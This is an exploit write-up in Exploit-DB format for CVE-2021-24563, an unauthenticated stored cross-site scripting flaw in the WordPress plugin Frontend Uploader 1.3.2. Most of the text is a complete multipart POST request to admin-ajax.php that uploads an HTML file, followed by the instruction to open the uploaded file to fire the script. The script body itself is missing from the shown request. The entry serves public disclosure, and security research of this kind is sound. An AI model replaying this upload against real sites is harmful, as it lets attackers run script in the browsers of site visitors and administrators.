# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated) # Date: 10/01/2022 # Exploit Author: Veshraj Ghimire # Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/ # Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/ # Version: 1.3.2 # Tested on: Windows 10 - Chrome, WordPress 5.8.2 # CVE : CVE-2021-24563 # References: https://www.youtube.com/watch?v=lfrLoHl4-Zs https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1 # Description: The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly # Proof Of Concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654 Content-Length: 1396 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_ID" 1247 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_title" test -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_content" test -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="files[]"; filename="xss.html" Content-Type: text/html -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="action" upload_ugc -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="form_layout" image -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="fu_nonce" 021fb612f9 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="_wp_http_referer" /wordpress/frontend-uploader-form/ -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="ff" 92b6cbfa6120e13ff1654e28cef2a271 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="form_post_id" 1247 -----------------------------124662954015823207281179831654-- Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html